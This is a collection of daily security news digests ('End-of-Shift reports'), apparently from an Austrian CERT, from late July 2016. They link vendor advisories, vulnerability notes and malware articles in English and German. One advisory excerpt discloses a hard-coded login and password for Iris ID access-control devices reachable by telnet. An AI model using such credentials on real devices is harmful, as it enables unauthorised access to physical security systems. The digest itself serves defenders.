As organizations embrace the digital transformation of their business, they are increasingly facing new security concerns. More companies are moving away from device-centric, platform-specific endpoint security technologies toward an approach that secures their applications and data everywhere. A new Citrix Qualtrics survey revealed that: More than half of Citrix customers reported that they are changing the way their SecOps teams are operated because of the increase in ransomware, targeted...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/29/protect-data-not-just-devices/
*** Virtually all business cloud apps lack enterprise grade security ***
---------------------------------------------
Blue Coat Systems analyzed apps for their ability to provide compliance, data protection, security controls and more. Of the 15,000 apps analyzed, it was revealed that 99 percent do not provide sufficient security, compliance controls and features to effectively protect enterprise data in the cloud. Shadow data still a major threat Their report revealed that shadow data, unmanaged content employees store and share across cloud apps, continues to remain a major threat, with 23 percent...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/29/business-cloud-apps-lack-enterpr…
*** Elektronikversand Pollin bestätigt schwerwiegenden Hacker-Angriff ***
---------------------------------------------
Nachdem die Kundendaten bereits für personalisierte Phishing-Angriffe missbraucht wurden, erklärte der Elektronik-Shop nun, dass seine Server angegriffen wurden. Die Täter haben viel mitgenommen, darunter auch offenbar die Bankverbindungen der Kunden.
---------------------------------------------
http://heise.de/-3281324
*** Malicious RTF Files, (Fri, Jul 29th) ***
---------------------------------------------
About a year ago I received RTF samples that I could not analyze with RTFScan or rtfobj (FYI: Philippe Lagadec has improved rtfobj.py significantly since then). So I started to write my own RTF analysis tool (rtfdump), but I was not satisfied enough with the way I presented the analysis result to warrant a release of my tool. Last week, I started analyzing new samples and updating my tool. I released it, and show how I analyze sample 07884483f95ae891845caf0d50ce507f in this diary entry. This...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21315&rss
*** Unter Windows 10 Pro gelten bald nicht mehr alle Gruppenrichtlinien ***
---------------------------------------------
Mit Windows 10, insbesondere dem "Anniversary Update", ändert Microsoft die Anwendungslogik von Gruppenrichtlinien. Künftig entscheidet nicht nur die Version des Betriebssystems (Windows 7/8/10), sondern auch die Edition (Pro, Enterprise). [...] Nach dem Update wird es mit Pro-Ausgaben von Windows 10 nicht mehr möglich sein, das Verhalten zentral zu steuern. Und ganz nebenbei werden auch Umwege verschlossen, zum Beispiel die Manipulation per Registry-Schlüssel.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Unter-Windows-10-Pro-gelten-bald-nic…
*** Citrix NetScaler Service Delivery Appliance Multiple Security Updates ***
---------------------------------------------
A number of vulnerabilities have been identified in the Citrix NetScaler Service Delivery Appliance (SDX) that could allow a malicious administrative user to crash the host or other VMs and execute arbitrary code on the SDX host.
---------------------------------------------
https://support.citrix.com/article/CTX206006
*** iPrint Appliance 1.1 Patch 6 ***
---------------------------------------------
Abstract: This patch includes bug fixes, security fixes and a consolidation of previously released patchesDocument ID: 5250978Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:iPrint-1.1.0.417.HP.zip (27.49 MB)iPrint-1.1.0.421.HP.zip (1,008.67 MB)Products:iPrint Appliance 1.1Superceded Patches:iPrint Appliance 1.1 Patch
---------------------------------------------
https://download.novell.com/Download?buildid=vv7Z6imI7Js~
*** iPrint Appliance 2.0 Patch 2 ***
---------------------------------------------
Abstract: This patch includes bug fixes, security fixes and a consolidation of previously released patchDocument ID: 5250983Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:iPrint-2.0.0.531.HP.zip (721.05 MB)Products:iPrint Appliance 2Superceded Patches:iPrint Appliance 2.0
---------------------------------------------
https://download.novell.com/Download?buildid=svMlzlyK0go~
*** Bugtraq: [SYSS-2016-046] Perixx PERIDUO-710W - Missing Protection against Replay Attacks ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539041
*** VU#217871: Intel CrossWalk project does not validate SSL certificates after first acceptance ***
---------------------------------------------
Vulnerability Note VU#217871 Intel CrossWalk project does not validate SSL certificates after first acceptance Original Release date: 29 Jul 2016 | Last revised: 29 Jul 2016 Overview The Intel Crosswalk project is a framework for developing hybrid apps for Android and iOS. The Crosswalk project does not properly handle SSL certificate validation when a user accepts an invalid certificate, preventing the app for validating any future SSL certificates. Description CWE-356: Product UI does not
---------------------------------------------
http://www.kb.cert.org/vuls/id/217871
*** Bugtraq: Vicon Network Cameras - Authentication Bypass ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539037
*** Bugtraq: [SYSS-2016-044] Logitech K520 - Insufficient Protection against Replay Attacks ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539040
*** Bugtraq: [SYSS-2016-059] Microsoft Wireless Desktop 2000 - Insufficient Verification of Data Authenticity (CWE-345) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539045
*** Bugtraq: [SYSS-2016-047] Perixx PERIDUO-710W - Keystroke Injection Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539042
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 27-07-2016 18:00 − Donnerstag 28-07-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Taking Steps to Fight Back Against Ransomware ***
---------------------------------------------
Ransomware is an attack in which malware encrypts files and extorts money from victims. It has become a favorite among cybercriminals because it is easy to develop, simple to execute, and does a very good job of compelling users to pay to regain access to their precious files or systems. Almost anyone and every business...
---------------------------------------------
https://blogs.mcafee.com/mcafee-labs/taking-steps-to-fight-back-against-ran…
*** Infection Monkey: Test a network from an attacker's point of view ***
---------------------------------------------
Infection Monkey, a tool designed to test the resiliency of modern data centers against cyber attacks, was developed as an open source tool by GuardiCore's research group. "Traditional testing tools are no longer able to effectively detect vulnerabilities in today's data center networks as they cannot continuously exploit the weakest link and propagate in-depth, resulting in a very partial view of network vulnerabilities" said Pavel Gurvich, CEO of GuardiCore. How...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/28/infection-monkey-test-network-at…
*** Verifying SSL/TLS certificates manually, (Thu, Jul 28th) ***
---------------------------------------------
I think that we can surely say that, with all its deficiencies, SSL/TLS is still a protocol we cannot live without, and basis of todays secure communication on the Internet.Quite often I get asked on how certificates are really verified by browsers or other client utilities. Sure, the canned answer that certificates get signed by CAs and a browser verifies if signatures are correct is always there, but more persistent questions on how it exactly works happen here and there as well. So, if you...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21311&rss
*** Passwort Manager: Lastpass behebt kritische Lücke ***
---------------------------------------------
Die gestern von Tavis Ormandy gemeldete kritische Schwachstelle im Passwort-Manager Lastpass ist nach Angaben des Unternehmens inzwischen geschlossen worden. Ein neue Lastpass-Version soll unter Firefox bereitstehen.
---------------------------------------------
http://www.golem.de/news/passwort-manager-lastpass-bestaetigt-behebung-krit…
*** Phishing-Angriff auf Pollin-Kunden ***
---------------------------------------------
Bei heise Security haben sich mehrere Kunden des Elektronikhändlers Pollin gemeldet, die befürchten, dass ihre persönlichen Daten einschließlich Bankverbindung bei dem Händler kopiert wurden.
---------------------------------------------
http://heise.de/-3280449
*** You cant turn off Cortana in the Windows 10 Anniversary Update ***
---------------------------------------------
Microsoft made an interesting decision with Windows 10's Anniversary Update, which is now in its final stages of development before it rolls out on August 2. Cortana, the personal digital assistant that replaced Windows 10's search function and taps into Bing's servers to answer your queries with contextual awareness, no longer has an off switch.
---------------------------------------------
http://www.pcworld.com/article/3100358/windows/you-cant-turn-off-cortana-in…
*** Security Holes Exposed In Smart Lighting System ***
---------------------------------------------
Sylvania Osram Lightify vulnerabilities could allow an attacker to turn out the lights or ultimately infiltrate the corporate network.
---------------------------------------------
http://www.darkreading.com/cloud/security-holes-exposed-in-smart-lighting-s…
*** Hintergrund: Windows 10 mit Schutz vor Pass-the-Hash-Angriffen ***
---------------------------------------------
Mit Hilfe moderner Virtualisierungstechnik soll der Credential Guard eine der gefährlichsten Angriffstechniken für Windows-Netze entschärfen.
---------------------------------------------
http://heise.de/-3280610
*** DSA-3633 xen - security update ***
---------------------------------------------
Multiple vulnerabilities have been discovered in the Xen hypervisor. TheCommon Vulnerabilities and Exposures project identifies the followingproblems:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3633
*** DSA-3632 mariadb-10.0 - security update ***
---------------------------------------------
Several issues have been discovered in the MariaDB database server. Thevulnerabilities are addressed by upgrading MariaDB to the new upstreamversion 10.0.26. Please see the MariaDB 10.0 Release Notes for furtherdetails:
---------------------------------------------
https://www.debian.org/security/2016/dsa-3632
*** Vuln: DBD::mysql my_login() Function Use After Free Remote Code Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/92118
*** Vuln: QEMU hw/scsi/esp.c Remote Code Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/92119
*** F5 Security Advisory: glibc vulnerability CVE-2016-4429 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/17/sol17075474.html?…
*** AXIS Authenticated Remote Command Execution ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016070209
*** DFN-CERT-2016-1153: Apache Software Foundation HTTP-Server, Lighttpd: Eine "Schwachstelle" ermöglicht HTTP-Proxy-Umleitungen ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1153/
*** DFN-CERT-2016-1216: Red Hat JBoss Operations Network: Mehrere Schwachstelle ermöglichen u.a. das Ausführen beliebigen Programmcodes ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1216/
*** Xen Security Advisory CVE-2016-5403 / XSA-184 ***
---------------------------------------------
A guest can submit virtio requests without bothering to wait for completion and is therefore not bound by virtqueue size. (This requires reusing vring descriptors in more than one request, which is incorrect but possible.) Processing a request allocates a VirtQueueElement and therefore causes unbounded memory allocation controlled by the guest.
---------------------------------------------
http://xenbits.xen.org/xsa/advisory-184.html
*** Sentinel 7.3 SP3 (Sentinel 7.3.3.0) ***
---------------------------------------------
Abstract: Sentinel 7.3.3 upgrade for Sentinel 7.3Document ID: 5250650Security Alert: YesDistribution Type: PublicEntitlement Required: NoFiles:sentinel_server-7.3.3.0-2205.x86_64.tar.gz.sha256 (109 bytes)sentinel_server-7.3.3.0-2205.x86_64.tar.gz (1.69 GB)Products:Sentinel 7.3.2Sentinel 7.1.1Sentinel 7.1Sentinel 7.3.1Sentinel 7.2Sentinel 7.2.1Sentinel 7.3Sentinel 7.2.2Sentinel 7.0Sentinel 7.0.1Sentinel 7.0.2Sentinel 7.0.3Sentinel 7.3.3Superceded Patches: None
---------------------------------------------
https://download.novell.com/Download?buildid=aGwCXcABsl0~
*** Cisco Security Advisories ***
---------------------------------------------
*** Cisco Nexus 1000v Application Virtual Switch Cisco Discovery Protocol Packet Processing Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Wireless LAN Controller Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Videoscape Session Resource Manager Denial of Service Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Prime Service Catalog Reflected Cross-Site Scripting Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco FireSIGHT System Software Snort Rule Bypass Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
*** Cisco Email Security Appliance File Type Filtering Vulnerability ***
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 26-07-2016 18:00 − Mittwoch 27-07-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Dridex Re-Mastered ***
---------------------------------------------
Well, its been quite an eventful time since last I posted. I have so much in the works that it is hard to tell where to begin. It seems that we are seeing new flavors of ransomware every week and botnets seem to come and go with a frequency weve not seen in a while. This week, though, I promised Dridex, so Dridex it is.
---------------------------------------------
http://www.scmagazine.com/dridex-re-mastered/article/511683/
*** Analyze of a Linux botnet client source code, (Wed, Jul 27th) ***
---------------------------------------------
I like to play active-defense. Every day, I extract attackers IP addresses from my SSH honeypots and performa quick Nmap scan against them. The goal is to gain more knowledge about the compromised hosts. Most of the time, hosts are located behind a residential broadband connection. But sometimes, you find more interesting stuff. When valid credentials are found, the classic scenario is the installation of a botnet client that will be controlled via IRC to launchmultiple attacks or scans.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21305&rss
*** Erpressungs-Trojaner: Malware-Entwickler spioniert bei der Konkurrenz - Opfer profitieren davon ***
---------------------------------------------
Auf Pastebin sind tausende Schlüssel zum Dechiffrieren von Daten aufgetaucht, die vom Verschlüsselungs-Trojaner Chimera gefangengenommen wurden.
---------------------------------------------
http://heise.de/-3279201
*** Kritische Lücke in Lastpass: Entwickler arbeiten an Lösung ***
---------------------------------------------
Tavis Ormandy hat eine kritische Sicherheitslücke im Passwort-Manager Lastpass gefunden und über Twitter gemeldet. Die Entwickler der Software arbeiten demnach bereits an einer Lösung.
---------------------------------------------
http://heise.de/-3279424
*** Black Hat 2016: Neuer Angriff schafft Zugriff auf Klartext-URLs trotz HTTPS ***
---------------------------------------------
Besonders in öffentlichen Netzwerken schützen verschlüsselte HTTPS-Verbindungen davor, dass Admins oder gar andere Nutzer im gleichen Netz den eigenen Datenverkehr belauschen. Dieser Schutz ist offenbar löchrig - und zwar auf fast allen Browsern und Betriebssystemen.
---------------------------------------------
http://www.golem.de/news/black-hat-2016-neuer-angriff-schafft-zugriff-auf-k…
*** Free and Commercial Tools to Implement the Center for Internet Security (CIS) Security Controls, Part 16: Account Monitoring and Control ***
---------------------------------------------
This is Part 16 of a How-To effort to compile a list of tools (free and commercial) that can help IT administrators comply with what was formerly known as the "SANS Top 20 Security Controls". It is now known as the Center for Internet Security (CIS) Security Controls. A summary of the previous posts is here: Part 1 - we looked at Inventory of Authorized and Unauthorized Devices. Part 2 - we looked at Inventory of Authorized and Unauthorized Software. Part 3 - we looked at Secure...
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/free-and-commercial-to…
*** From Locky with love - reading malicious attachments ***
---------------------------------------------
Read on to learn how the latest downloaders used to deliver Locky ransomware and show how to statically decipher their hidden URLs.Categories: Malware Threat analysisTags: downloaderLocky(Read more...)
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2016/07/from-locky-with-love-…
*** httpoxy in Österreich ***
---------------------------------------------
Wir haben vorige Woche eine Warnung zu httpoxy veröffentlicht, dabei geht es um: CGI ist ein Standard, mit dem Webseiten dynamisch mit Hilfe von Scripten serverseitig erstellt werden können. Dazu werden die Informationen über den Client und zur Anfrage in Umgebungsvariablen an das Script übergeben. Enthält der HTTP-Request einen Header "Proxy:", dann wird der Inhalt dieses Headers in die Umgebungsvariable HTTP_PROXY...
---------------------------------------------
http://www.cert.at/services/blog/20160727173056-1764.html
*** Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access ***
---------------------------------------------
The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials. When visiting the device interface with a browser on port 80, the application loads an applet JAR file ICAMClient.jar into users browser which serves additional admin features. In the JAR file there is an account rou with password iris4000 that has read and limited write privileges on the affected node. An attacker can access the device using these credentials starting a simple telnet session on port 23
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
*** Iris ID IrisAccess ICU 7000-2 Remote Root Command Execution ***
---------------------------------------------
The Iris ID IrisAccess ICU 7000-2 device suffers from an unauthenticated remote command execution vulnerability. The vulnerability exist due to several POST parameters in the /html/SetSmarcardSettings.php script not being sanitized when using the exec() PHP function while updating the Smart Card Settings on the affected device. Calling the $CommandForExe variable which is set to call the /cgi-bin/setsmartcard CGI binary with the affected parameters as arguments allows the attacker to execute
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5346.php
*** Iris ID IrisAccess ICU 7000-2 Multiple XSS and CSRF Vulnerabilities ***
---------------------------------------------
The application is prone to multiple reflected cross-site scripting vulnerabilities due to a failure to properly sanitize user-supplied input to the HidChannelID and HidVerForPHP POST parameters in the SetSmarcardSettings.php script. Attackers can exploit this issue to execute arbitrary HTML and script code in a users browser session. The application also allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5345.php
*** F5 Security Advisory: MySQL vulnerability CVE-2016-2047 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/53/sol53729441.html?…
*** Bugtraq: [security bulletin] HPSBST03603 rev.1 - HPE StoreVirtual Products running LeftHand OS using glibc, Remote Arbitrary Code Execution, Denial of Service (DoS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539015
*** Siemens SIMATIC WinCC, PCS 7, and WinCC Runtime Professional Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for two vulnerabilities in the Siemens SIMATIC WinCC, PCS 7, and WinCC Runtime Professional.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-208-01
*** Siemens SIMATIC NET PC-Software Denial-of-Service Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a denial-of-service vulnerability in the Siemens SIMATIC NET PC-Software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-208-02
*** Siemens SINEMA Remote Connect Server Cross-site Scripting Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a cross-site scripting vulnerability in the Siemens SINEMA Remote Connect Server application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-208-03
*** Rockwell Automation FactoryTalk EnergyMetrix Vulnerabilities ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on June 21, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for authentication vulnerabilities in the Rockwell Automation FactoryTalk EnergyMetrix application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-173-03
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 25-07-2016 18:00 − Dienstag 26-07-2016 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** Devices with Qualcomm modems safe from critical ASN.1 telecom flaw ***
---------------------------------------------
Despite initial concerns, smartphones equipped with Qualcomm modems are not vulnerable to a recently announced vulnerability that could potentially allow attackers to take over cellular network gear and consumer mobile ..
---------------------------------------------
http://www.cio.com/article/3099688/devices-with-qualcomm-modems-safe-from-c…
*** Patchwork cyberespionage group expands targets from governments to wide range of industries ***
---------------------------------------------
Symantec finds that Patchwork now targets a variety of industries in the US, China, Japan, South East Asia, and the UK.
---------------------------------------------
http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expand…
*** Bugtraq: [security bulletin] HPSBGN03630 rev.1 - HP Operations Manager for Unix, Solaris, and Linux using Apache Commons Collections (ACC), Remote Code Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539001
*** Trump, DNC, RNC Flunk Email Security Test ***
---------------------------------------------
Donald J. Trump has repeatedly bashed Sen. Hillary Clinton for handling classified documents on her private email server, even going so far as to suggest that anyone who is so lax with email security isn’t fit to become ..
---------------------------------------------
http://krebsonsecurity.com/2016/07/trump-dnc-rnc-flunk-email-security-test/
*** Bugtraq: July 2016 - Bamboo Server - Critical Security Advisory ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539003
*** DFN-CERT-2016-1197/">Perl: Zwei Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1197/
*** Mobilfunk: Sicherheitslücke macht auch Smartphones angreifbar ***
---------------------------------------------
Große Teile der Mobilfunkinfrastruktur sind laut Sicherheitsforschern über eine Lücke in einer Software-Bibliothek gefährdet. Ein Fix steht zwar bereit, doch Updates wird es für die meisten Geräte wohl nicht geben.
---------------------------------------------
http://www.golem.de/news/mobilfunk-sicherheitsluecke-macht-auch-smartphones…
*** Amazon Silk browser removes Google’s default encryption ***
---------------------------------------------
Google’s good intentions of keeping searches made via its search engine protected through default encryption have been stymied by Amazon. A bug in the Amazon Silk ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/26/amazon-silk-bug-encryption/
*** 50+ vulnerabilities found in popular home gateway modems/routers ***
---------------------------------------------
Researcher Gergely Eberhardt with Hungarian security testing outfit SEARCH Laboratory has unearthed over fifty vulnerabilities in five home gateway modems/routers used by Hungarian Cable TV operator UPC Magyarország, but also by many ISPs around the ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/26/home-gateway-modems-vulnerabilit…
*** Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer that may allow a malicious administrator of a PV guest VM to compromise or crash the host.
---------------------------------------------
https://support.citrix.com/article/CTX214954
*** Low-cost wireless keyboards open to keystroke sniffing and injection attacks ***
---------------------------------------------
Bastille Networks researcher Marc Newlin has discovered a set of security vulnerabilities in low-cost wireless keyboards that could be exploited to collect all passwords, security questions, sensitive personal, bank account and ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/26/keystroke-sniffing-wireless-keyb…
*** DFN-CERT-2016-1199/">Xen: Zwei Schwachstellen ermöglichen u.a. das Erlangen von Administratorrechten ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1199/
*** Command and Control Channels Using "AAAA" DNS Records, (Tue, Jul 26th) ***
---------------------------------------------
Dataexfiltration and command and control channels via DNS are nothing new exactly. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21301
*** DFN-CERT-2016-1200/">Moodle: Mehrere Schwachstellen ermöglichen u.a. das Ausspähen von Informationen ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1200/